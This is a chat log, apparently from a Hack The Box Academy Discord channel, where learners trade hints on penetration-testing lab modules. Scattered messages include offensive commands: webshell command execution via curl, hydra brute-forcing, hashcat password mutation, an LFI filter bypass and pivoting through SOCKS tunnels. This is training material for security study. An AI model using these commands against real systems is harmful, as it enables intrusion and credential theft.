You mustn't forget @fathom pendant . He also lives here
Need to hire them both for some 1on1 study time
$30/h :^) I'll just screen share me googling
How i can learn hacking
i'm not on there yet you can get 1 on 1 Tutoring 🤣 https://www.hackthebox.com/newsroom/discord-lab-tutoring
Attacking Common Services - Hard module
Can anyone help me please? I'm stuck for a few days.. I found user F**** and credentials to RDP.. tried to connect to MSSQL with it - seems the right way..
I tried everything -qsqh, and in win: SSMS and sqlcmd.. none worked.. Any help?
Give me one sec, I finished the module, ill have to look back at my notes.
No, I don't think I did. Sorry
Anyone available to give me some assistance on the file upload skill assessment? Been stuck for four days now....
hey guys, im on sql essentials module on running sqlmap on http request, i have dumped all the data but i dont know what the question of What's the contents of table flag2? (Case #2) is asking for.
Ugh, could use some help with the skill assessment in shells & payloads module. I'm stuck at the very beginning. I can not get a shell on host 1. I tried both Podalirius' tomcat shell from GitHub and crafting a war file with msfvenom. Nothing connects back the listener i have running on 443 on the foothold machine (which i RDP'ed into).
Solved: use SQLmap command directly instead of manually putting in the sql injection.
Are you sure you have the callback posting to the right IP? hint not the 10.x.x.x address
@sinful olive Would you like a dm?
im doing htb appointment
however i have the flag just this one stupid fucking question im stuck on
If user input is not handled carefully, it could be interpreted as a comment. Use a comment to login as admin without knowing the password. What is the first word on the webpage returned?
**s
the answer is supposed to be 15 letters long
i did what the task asked me to do but nothing showed up no error code which im assuming is the answer
and the word ends with "s"
Please Help on LINUX PRIVILEGE ESCALATION...Credential hunting I ssh into htb-student but no wp-config.php file exists. What am I doing wrong?
@dark hollow What part of the module are you at?
Page 9 Credential hunting
Did you utilize the find command they gave?
ffuf skills
Yes I did. I tried it again and found what I'm looking for thanks. Must have skipped over the file the first time.
Sure, feel free to DM
Thanks. I tried both, i believe. I will revert the target and re-try with the internal network IP.
footprinting, smtp, 2nd question, im using module ||auxiliary(scanner/smtp/smtp_enum) on metasploit|| i found a bunch of usernames but none of these are accepted, i tried doing it without ||metasploit||, with ||smtp-user-enum|| but it takes a very long time to do 10 million usernames, i tried the smaller wordlists without any luck, may i please have some help?
ATTACKING WEB APPLICATIONS WITH FFUF, Directory Fuzzing.... i have found the answer with gobuster in 5seconds....
with ffuf...nothing...
i dont like that tool...what do i wrong..?
Hi yes I'd like.. Thanks..
Appointment is a box, verify your HTB account in #bot-commands by typing in ++verify and following instructions and ask your question in #boxes
dw i got it all figured out
Just for future :)
Thank you!!
is it possible to filter these outs:
?
this is gobuster
i mean why would you use ffuf, when gobuster looks so clean?
ffuf has a lot more functionality than just directory brute-forcing. It's a fuzzing tool. Gobuster is more of a directory brute-forcing tool which has limited options for fuzzing.
alright....
Login Brute forcing - Skill Assessment: Website
Anyone wanna provide some guidance or a nudge? Wanna make sure I am using the right password list and method.
Hello! On the section Linux Local Password Attacks/Passwd, Shadow, & Opasswd.
I copied the shadow and passwd file, unshadowed and I'm running hash with rockyou to crack the root passwd.
It's taking long time and no results so far. Is this the way that is supposed to be or I am missing something here?
Yes you can filter those out by using -mc 200
You can also filter by response size. For example if you fuzzed and got a similar response size for non existent directories i.e Size: 1738 you can use - fs 1738 so ffuf only outputs responses that don’t have a size of 1738.
You can also use the -c switch which renders the output of the status codes in different colors
Yo
Hashes shouldnt take long to run against a password list
Maybe I am wrong, but general rule of thumb is password cracking or hash cracking shouldn't be taking over the lifespan of the box.
Hello
anyone know why I'm getting this error
doing the --asreproast
This would be for Crackmapexec
error is Err no connection error (INLANEFREIGHT.HTB:88) name or service not known
Using Web Proxies - Web Fuzzer
Q: ... then try to use ZAP Fuzzer to fuzz the cookie for different md5 hashed usernames to get the flag...
Following the advice of others here, I just used burp instead. with the provided username list, it gave me 19 different hashes, but Im not really sure how to get the flag. I replaced the cookie with each individual hash and nothing.
using GetUserSPNs.py on a Windows 10 machine...getting Errno 111 Connection refused in Kali...
I think the question is for + or - 1 seconds right? It looks like yours goes from -2 seconds to + 0.001 seconds
I used start_time = now - 1105, end_time = now + 1105
The above web application employs more than one filter to avoid LFI exploitation. Try to bypass these filters to read /flag.txt
File Inclusion/Basic Bypasses
Someone give me a hint? Been trying a few different things.
how could this work?
- 5 Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload)
what about it do you not understand?
could i dm you?
i got confused after i add last payload letter $a$
so yes
ive setup ssh -D 9050 and then ive used proxychains firefox-esr to an internal ip page (in attacking enterprise) and it works but it is extremely slow and I have lots of "temporary failure in name resolution" errors in my ssh -D 9050 session -- any ideas?
The slowness is normal.
ok thanks rat, i know this DNN is exploitable so im getting too excited to wait for the slow loads
You'll also experience those name resolution issues, as your extensions and such try to reach out to locations that they can't.
ah right i understand
One alternative for single hop proxy situations, you can use foxyproxy, instead of piping all of firefox through proxychains.
It can be set up for socks proxies.
oh yeh that is HEAPS better
i just set it on port 9050 with socks 4
much much better
I don't know if foxyproxy supports multiple proxies (in a chain), but if it's just the one hop, it's definitely the better option.
cheers
it asked which app is disabled on startup
how can I tell from the results could anyone let me know or point me to some resources thanks (i got the answer since i just tried both of them but wanna know how without using gui xd)
am i the only one who thinks the pivoting tunneling and port forwarding skills assessment was very easy? 🤣
Please help!! #1024429874246590575
with what lol
not a furry lol
what is this on?
damn it's been a long time
you got this 🫂
Nah i can try
yeah but it was ages ago lol and i don't take good notes
I remember using this thingy.
Also have you checked apache openmeeting bug?
You should if I remember.
I am offended you called me a furry 🤣
im not @forest tapir 👀
Wait what?
I'm the only punk rock lgbtqiaxtsvff12 furry here
no wait there's Emma but I don't think she's punk rock
nah there are bajilllions of furries on this server I swear to god.
For documentation and reporting, would DCSync count as a finding? Or how would you categorize it in a report if at all?
like, "got password for this user, they have dcsync perms, grabbed DC administrator hash, gg no re", how would you reflect that in a report?
As far as I understand, I think a 'finding' qualifies more as something that was a misconfiguration/vulnerability, in that respect. A user who is supposed to have a certain function/ability isn't technically a finding. Maybe something along the lines of 'excessive permissions' could qualify, if the permission is something that a user shouldn't have.
yeah but if not a finding, how would you opt for reflecting it in the report?
or do you just...not?
I think it depends on the situation, more than anything. If you get access to a user, because of a weak password, that's definitely a finding. However, if that user had domain admin, that isn't technically a 'fault' of the permission itself. You only abused the password aspect.
If a user had DCSync privileges because of some business need, it isn't technically a vulnerability - same as you would consider that a sysadmin needs access to certain functions, to do their job.
okay okay but thats not my question
my question is how do you reflect it, if at all, in the report
Well, if it's not a finding, it doesn't go in findings. ;D
cool, been established
hi
u got this ?
Have you tried this on pwnbox
?
it would
so maybe ur script is wrong
wait dm
you must be playing with me
yeah, but don't be standard internet guy about it
sorry. Won't happen again.
it literally happens 10+ times a day in this channel. A monk's patience runs out eventually
hi
ok
why would you delete my message bro
@novel matrix when ya get the chance wanna yell at some people to stay on topic
Attack the target, gain command execution by exploiting the RFI vulnerability, and then look for the flag under one of the directories in /
How do i look around in other directories
just specify the path
Thank you for the push.
For some reason i could navigate to other directories but not root. Which now makes sense if i don't have priv
Yee
YEE
Hey
53
May I get a nudge with Attacking Common Services: Attacking FTP Question 3: Use the discovered username with its password to login via SSH and obtain the flag.txt.file. I’ve attempted hydra attacking ftp and ash with the provided module password list and rockyou.txt but have not found the password.
double-check if there isn't an "unusual" port that you can utilize
Oh I forgot to utilize hydra with the “unusual” port. Thank you for pointing that out! 😃
Hello,
Can someone help me with the Command Injection Module Skills Assessment?
Im able to move files to the tmp folder and capture the request in burp but not sure where to go from here.
http://142.93.33.226:30942/index.php?to=tmp&from=605311066.txt&finish=1&move=1
Looking at the response in repeater gives me a thousand lines of code and not sure where to go next. Can someone nudge or dm me please?
did u resolve that problem with dcsync?
Didn’t find anything utilizing hydra and “unusual” port with the provided password list from the module and attempted hydra attacking ftp with the “unusual” port. Any other hints?
it should be a high number port, if you are not seeing it feel free to reset your target
high number -> between 1000-9999
Thank you! Will try that
May I dm you to not spoil anything
sure go ahead
sudo apt install mariadb
https://unix.stackexchange.com/questions/584194/error-installing-mysql-in-parrot-linux
#Attacking DNS - ATTACKING COMMON SERVICES
I found the h*, but when I do axfr it simply doesn't work.. Any help?
Hello, I would like to ask, what type of content can I find in modules, is this a text-based learning experience, or are there videos?
No videos as it isn't allowed past Tier 1 and up
Hi,
On the shell & payload module in the final engagement i have a serious problem with the box !!!
I tested on my kali and pwnbox and is the same.
We need to use xfreerdp or remmina (I tested both) but every time the connection is lost with the box it is impossible to work ....
i faced exactly similar issue a while ago
Oh no ....
Isn't there anyone from the support team here to do something?
Impossible not to complete the module!
i think support team will help u
thank you
Could someone confirm that this module https://academy.hackthebox.com/module/details/143 will be video-based ?
be more specific
a video walkthrough of the information created by someone from htb?
I just wonder what I can expect in this module, as I see lot of topic are listed, but I don't know how knowledge is delivered 🙂 articles with examples and labs task, or there is trainer explaining topics like on udemy
if you have some experience with academy, you should know that there aren't any videos by instructors and that the information/module/section is developed by the creator(s) of the module it self
thank you
Hi, i already uploaded the php shell file in the right path of the WebServer. But i'm only able to execute only some commands like:
curl http://10.129.236.12/shell.php\?c\=whoami
nt authority\system
How can i obtain a rev shell ? Thanks
multiple ways, powershell oneliner, uploading a file then executing it and etc
What's the best way to contact them?
There is no support mail on HTB Academy.
on htb-academy site u can see this htb logo at bottom right corner
From here u can send messages
to the support team
My email is not accepted on this support
that's odd
When i open the chat i have this question.
If i select not really the chat is closed and with the other option it asks me for an email ...
When doing the linux based stack overflow challenge, after entering the buffer and nop sled into gdb, i went to check the memory, but found a bunch of C2 inside the nop sled, any workarounds for this?
Ok for information to contact the support use firefox, not chrome.
And if you have a problem with your connection in RDP use your VPN in TCP connection not with UDP.
A support with an incredible reactivity !!
Let's go to continue my module 😉
hello everyone i have bought pen 200 (oscp) and i am doing proving grounds play and practice. before this i have done a good amount of ctf machines on hackthebox, i have experience and i will give the exam in 2.5 months so i want a partner to study with me but not a beginner. if anyone is interested please message me 🙂
stuck on the 5th and 6th question of the pivoting tunneling skills assessment, a nudge in the right direction would be appreciated. The farthest I've gotten is getting a meterpreter shell on PIVOT-SRV01. When I run ping_sweep from that machine, there are no other machines, so I'm not sure what to do next. I know the hint ||says that we might get something from lsass||, but I'm not sure what to do with it nor do I understand how that will help me reach the DC.
Ugh, this is getting annoying. I'm stuck at the skill assessment in the shells & payloads module. I can not get a shell on host 1. I tried both the tomcat with a msfvenom crafted war payload and the local inlanefreight website with laudanum. Whatever i try i can not get it to work.
I remember I got it to work by uploading using the Burp Suite browser and referring to the "Bypassing File Type Restriction" section in PHP WebShells
I know I also used the Antak webshell, just don't remember if it was on the first host or not
Okay, thanks. Will try that out. Which IP did you use for ||LHOST||? I can't connect my listener on NC.
Also, I'm pretty sure that reverse shells don't work
This is an extremely frustrating and vague skill assessment imo, not a fan.
I am going to try it now. Is it okay if i DM you, if we need to continue this conversation?
no problem
Thanks alot.
Goddamn son, ||Antak|| did the trick! That was the best and most direct solution. I was trying to do a lot of complicated stuff with reverse listeners, LHOSTS, etc. The sample in the cheatsheet about creating custom msfvenom payloads for war files got me all messed up. ||the tomcat route did not work for me, or better said i don't know how to get that working. So i went with Antak (as you suggested) and the vhost route||.
Glad you were able to progress!
Me too.
Bringing this back up...
Hi! I'm having the same problem. Did you solve it?
Yea i finally managed to solve it, by doing import sys; sys.stdout.write(b'\x41' * ....) instead of using print
Okay thanks 🙂
I've just solved using print but using python2 instead of python3. It's another workaround 🙂
Im on module: Password Attacks, section: Password Mutations. I used custom.rules, best.rules from hashcat, bruteforced FTP instead of SSH cuz it's faster. Im stumped
so that particular question cannot be solved in the time they allot. Take your mutated password list, delete the first 17000 or so from the top of the list and start it again.
"What is the name of the executable file associated with the Local Security Authority Process? " cuz apparently it's not || lsass.exe ||
can anyone help me 🙂 and sry for the dumb question
which machine is it
actually it is
it's from attacking lsass from password attacks
well i thought so too but htb academy disagrees with me
Someone else has issues with the FTP Service on the Attack common services Lab? i scanned the system with nmap but got this:
make sure you dont have a space or something. That is the answer that I used and it was correct.
oh im stupid, i think it bugged out on me and i had to refresh 🤦♂️
thank you for the time
what is your output
i think im not allowed here to share my screenshot 😄
but got this as output:
nmap -p21,2121 10.129.176.202
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-22 16:16 CET
Nmap scan report for 10.129.176.202
Host is up (0.086s latency).
PORT STATE SERVICE
21/tcp closed ftp
2121/tcp closed ccproxy-ftp
Nmap done: 1 IP address (1 host up) scanned in 0.41 seconds
usually a reset on that target fixes the issue
what hashcat rule to use
I've tried everything i can, please help me with these Which option needs to be set to create a home directory for a new user using "useradd" command?
Which option needs to be set to lock a user account using the "usermod" command? (long version of the option)
help
use the mutated password list and filter words starting with b and use them
I need a little assistance on the LINUX PRIVILEGE ESCALATION Module. Page 11 shared object hijacking. I SSH into htb-student run ls -la payroll and it always tells me no such file or directory???
dont need any rules
the mut password list you created
try to find it, it might not be in your current working directory
create your list: hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list then run hydra: hydra -l sam -P mut_password.list ssh://<ip address>
did you see what I said earlier about deleting the first 17000 entries?
yes
the password resides between 18000 and 19000
thank you, I'll make that
make sure you have this too
ok
but actually how is it possible to get so many entries
$ wc -l mut_password.list
1504 mut_password.list
how can i gain cubes without buying them?
Complete modules
No one? 😢
you are appending the rule to an existing wordlist containing password, hashcat will generate a new wordlist based on the rule that you specify
nope
ok how much i can cover?
log into the website you will see
i seen , but i didn't end all the basic and only i want to know
but ok no problems , thx
just realised that the resources U download give U already custom.rules now it makes sense
yes
I made it thx for help
Hello guys, I am having trouble finding a flag in the 'GET' Section of the 'Web Request' module in the academy platform. Even when I use curl i dont see any flag in the http headers.
Install it
have you tried searching for something using the search feature?
Yes, I did and it doesn't take me to the search.php file, but when i use the search.php it still doesn't display any flags.
I have already sorted this, i was using an incorrect search term.
I am doing the windows fundamental module and in the windows security sub page, I don't think I understand the final question. I am running the command Get-Service | Where-Object {$_.StartType -eq "disabled"} to get all the disabled services but none of them are the answer it is asking for. Can someone help clarify the question? (i tried all of the Name objects as answers) i am thinking the Open ssh is the 3rd party one as i think the official one is called sshd
Can someone help me with the Command Injections - skill assessment please?
May I get a nudge with Attacking Common Services: Attacking FTP Question 3: Use the discovered username with its password to login via SSH and obtain the flag.txt.file. I’ve attempted hydra attacking ftp and ash with the provided module password list and rockyou.txt but have not found the password.
❤️ academy 🙂 I'm kinda lacking in my knowledge of how certificates work. Would be great to see a certificates module in academy 😄
hint ||the move parameters||
hint there is ||multiple ftp|| and do some enum first before you brute force
so which section are you in? i'm too lazy to double check on the academy and my notes have no section with that name
the hint in that section will lead to some ||cred|| and for the finding the next machine part i would suggest a gui tool named wnetwatcher or use the given cmd ping sweep
Thanks for the reply, may I dm you?
sure
Need some help on Attacking Common Applications - Attacking GitLab. Looks like the ExploitDB script that is in the section doesn't seem to work.
Getting errors like $'\r': command not found and syntax errors
Got it to run but getting LOOP and 302 output haha
^ this was intended and got the answer
I'll take a look at what the hint leads to again, but regarding the ping sweep, there were no other machines in the || 172.16.6.0/16 subnet ||
did you use the powershell ping sweep?
@fierce pewter Can I DM you regarding this one? (or @livid pier)
that one doesn't work for me so I have to use the wnetwatcher tool, but when re-doing my notes for this I gave the cmd ping sweep a try and that worked like every time
oh yeah @livid pier thanks for the hint ❤️, i only got that because of your hint 🤣
Hi, I'm Rory. nice to meet u
glad i could help
I am working on the hashcat module in academy. I am on the WPA/WPA2 section. I am wondering how to get the pcap files into the pwnbox available for academy?
If it is in the module resources you can wget the url for the resource
Login Brute Forcing - Skill Assessment Website: I am stuck on the first question, been running brute force against the IP. I believe I am missing something simple, as others all seem to easily be able to get the first question. Been stuck on this question for some time, help would be appreciated!
wget
yep or if you want to upload something on to the pwnbox you can use updog with ngrok
a list that is in the cheatsheet will get you the credentials
pay attention to the request that is being made upon logging in
Can you copy the link then do a wget from the pwn box?(sorry didnt read the other 2 responses that said the same thing)
yes, I was able to get the files with wget. For whatever reason now though, I cannot unzip them
if I cat it out, I get a bunch of HTML, so probably just got the server response?
Didn't see the cheat sheet had that, but I have been using the cred lists. I am just wondering if the command I am using is messed up due to be.
yes
I'm guessing you did wget http://-something -o filename.zip
try it without the -o
when you wget on powershell you need the -o
At least I think so, I'm wrong a lot
The other two longer options you have if this doesn't work:
save the files to something like google drive then access that on your pwnbox
log into academy from the pwnbox instance
that might have to be what I resort to because I was not using the -O option before.
lol maybe try it with the -o option first then
@visual quail
idk if pwnbox is different
I ended up getting it by signing in with pwnbox and got it.
could be
That boy dont dance but he makes moves
@visual quail I was working on a WPA problem in pico this morning and I used this tool for the first time
if pwnbox has it you might want to run it when you are done with the section to try it out
exactly just like we learned from trying to download the pcap to begin with, we need multiple routes
for sure!
I'll keep trying, but do you mind if I DM you the command to check whether it is wrong?
sure
Hello everyone! Anyone working on the Bash Scripting module? I've been stuck for a while in the comparison operators section.
@arctic sentinel What ye stuck on?
Phew That footprinting module was a big one
ah I used metasploit's ping sweep and the powershell version of ping sweep
I'm going for another run at it and I'll try it out
Thank you @vital adder
That one tripped me up too
bro why are "easy" machines not even easy, am I just so inexperienced in some of these or are they sometimes not rated properly
not relevant to this channel. But the answer is that HTB is notoriously more difficult than other platforms. HTB easy is other platforms' medium and hard
you can verify your HTB account in #bot-commands with ++verify alongside reading #rules and #welcome
that's very good to hear, because if people can solve those machines easily then it's just not even worth it for me lol
alright will do
not sure if I'm allowed to mention it in this server but would THM be a better platform?
for intermediate
that is off-topic for this channel; this is why we are pushing you to verify your htb account and ask in another channel that you'll have access to once verified
ah got it
have you tried obfuscating with HTML encoding? or if it's blocking traversal you can try doing ....// as MOST filters that filter for directory traversal filter out the single ../ leaving the remaining one, which should work
are you testing using a common read/read/write directory?
I'm not familiar with that unfortunately, I was just throwing things out there that I've seen suggested in this channel
gl
maybe re-read the module; maybe there's something you missed?
at least until someone smarter than me pops in and is like "have you done very obvious thing"
Well, machine died again and I've tried all methods I could think of to find another machine on the network and there is nothing. I dumped sam and secrets but I don't know what to do with them 😅
and it seems like PIVOT-SRV01 is the DC according to the Server Manager app
did you try the tool i suggested?
yes
no idea what you mean by this but that machine isn't "the DC"
give me a sec i'll give this a check
There's a Server Manager application on that machine and from reading the information it shows, I understand that PIVOT-SRV01 is the Domain Controller
just to be sure, you're saying that there's another machine on the 172.16.6.0 subnet?
yep
I wish I had saved as much info as I did for each machine in Offshore, but the SRV01 machine is a Windows server, not a domain controller, or it's a domain controller in a domain controller 🤣 not sure if this is possible but I just can't say with the info that I have right now
yeah... well crap
pivot-srv01 is a pivot server, not a domain controller; just because it has a Server Manager application open does not make it a DC
no idea how to find the other machine on that subnet
it just means it's acting as a server
ah okay, but shouldn't it at least show the DC it's connected to? I couldn't find any other servers
for /l %i in (1,1,254) do @ping -n 1 -w 100 192.168.0.%i | findstr "Reply" run this in command prompt
I tried that
You are on the right track. You can try which operator is not blocked first and use its encoded version from the table in the module. After that you can inject
in the 172.16.6.0 subnet
and you ping swept that net yeah?
doing the File Inclusion module > LFI and File Uploads > I uploaded the image and got the cmd > but I'm stuck there; there is a file with .txt that looks like a flag, when I used cat it showed me GIF8, I thought it's the flag but it's not, and inside GIF8 is empty. What to do? help pls
the only response was from the same machine
did you also find the creds for other user?
yes, nothing other than itself
which module are you doing again? sorry that got lost somewhere
I haven't tried cracking the hashes but I dumped sam and secrets
tunneling and pivoting skills assessment
once in as the <first user> that you get from the foothold, you should be able to jump to the 172.16.5.0/23 subnet using the credentials; once on THAT one it's on the .6 subnet
help pls
can I DM you?
oh wait i can't find the machine either
yeah let me pull up my parrot to see if I can jump in and run it real quick to confirm
see? 😂 this has been driving me crazy
@fathom pendant can u help me too pls
nope wait, the tool I suggested found it
but still kinda weird, the cmd ping sweep should find it
the pivot tool has fping installed to find the first jump host
let me try with metasploit
it must be because the DC doesn't respond to pings
crap
the DC is on a third network 🤣
this is exactly what I'm doing
btw you are on the v* user yeah?
ah you have to login as the v* user??
if you remote in then there's nothing else you need to do :) hint: file-explorer
yes
but that's on the second host
yeah yeah on the second host
iirc
well damn
you go foothold -> m* -> v*
I was NT\AUTHORITY on the second machine and didn't see anything in v* user's folders
NT\AUTHORITY through meterpreter
I'm assuming v* user creds need to be cracked from sam dump?
nope, hint the hint
doing the File Inclusion module > LFI and File Uploads > I uploaded the image and got the cmd > but I'm stuck there; there is a file with .txt that looks like a flag, when I used cat it showed me GIF8, I thought it's the flag but it's not, and inside GIF8 is empty. What to do? help pls
Use a proper command
like?
inside that .txt there is only a file named GIF8 and inside that it's empty
Leave GIF8
Cat the file in front of you and leave the GIF8
More I can’t tell you otherwise I get spanked by @west canopy
yep
I said leave the GIF8
Might I be able to dm you pls?
then what should i look for gimme a hint or something
yes but there is no ||cracking|| involved
@verbal galleon nah i got the flag
Great
@verbal galleon thanks for the help, but I didn't get how I'm supposed to know that I have to remove it 😦
GIF8 is just the metadata for a gif file
And this is not an LFI, it's an RCE you got there
but in the chapter they didn't mention that we have to remove it in order to get the file or flag though
No you should think of it yourself
😦
yes of course
Are you doing the cpts path?
@ivory dock make sure to run the ping command as admin as well
that may be why you're not finding the thing
I'm doing the tier 0
Allright good luck
If you need help, just DM me. Almost done with cpts path (99%)
wow I will be your student xd
how can I get the "academy user" rank? I can't find the API of academy
@ivory dock after re-running the commands to find the right host - I was able to seamlessly connect and get answers; if in an hour you are still stuck DM me
@sweet oar I'm brand new to HTB and I'm stuck at this point. Have you gotten any further?
what point; you didn't reply to their comment so we have no context to assist you either
Heading to bed now, so I'll try again tomorrow. I'll make sure to run commands with an admin prompt. Thank you
Does anyone know the command to connect to the SQL server directly?
I found the passwords but I am not able to enumerate
I tried as both user and admin cmd prompt; user prompt wasn't doing anything
what module is this?
Noted
it helps if you give us context of the module and section you're working on so we can look back at our notes regarding how we performed the enumeration and flag capture
attacking common service
attacking mysql
I found the password but I am not able to enumerate
ah, attacking the MySQL service; I believe that one is fairly simple, give me one moment to go over my notes for that
if the port is open you can just use the regular mysql client
just read the section again
is the sql server open from the outside? as in if you try and scan the sql server; is it reachable
if not - then you may need to remote in and do the command
i believe that RDP port is open on this system is it not?
one moment
yes sir
and you said you did find the password for the mssqlsvc user yes?
ok one moment please
ah, "server could not find" means that you had an error; it thinks you put the password in as the user
no
I am in server now
MySQL target -U msssqlsvc -P ‘pri xxxxx’
Does work, but I'm not able to enumerate
elaborate
are you running the commands?
are you remembering to end commands with ;
mysql 10.129.62.213 -U mssqlsvc -P 'pxxxxxxx'
after that sir
There are a bunch of open servers but not sure which one it is and what I need to enumerate
also use lowercase -u and -p; Linux is case sensitive
should be able to show databases; to see it
no
show databases; shows all available databases you can use
use <databasename>; selects the database for use
also
Sorry
to connect to a non-local server
you NEED to specify
-h <ip>
otherwise it won't properly connect sometimes
Can you see the dm
Please
What's going on?
Attacking Common Services - SQL
usage: mssqlclient.py [-h] [-port PORT] [-db DB] [-windows-auth] [-debug]
[-file FILE] [-hashes LMHASH:NTHASH] [-no-pass] [-k]
[-aesKey hex key] [-dc-ip ip address]
target
mssqlclient.py: error: unrecognized arguments: -u mssqlsvc
mssqlclient.py 10.129.62.213 -u mssqlsvc -p 'prinxxxx'
that was the command
what do I need to fix?
add -windows-auth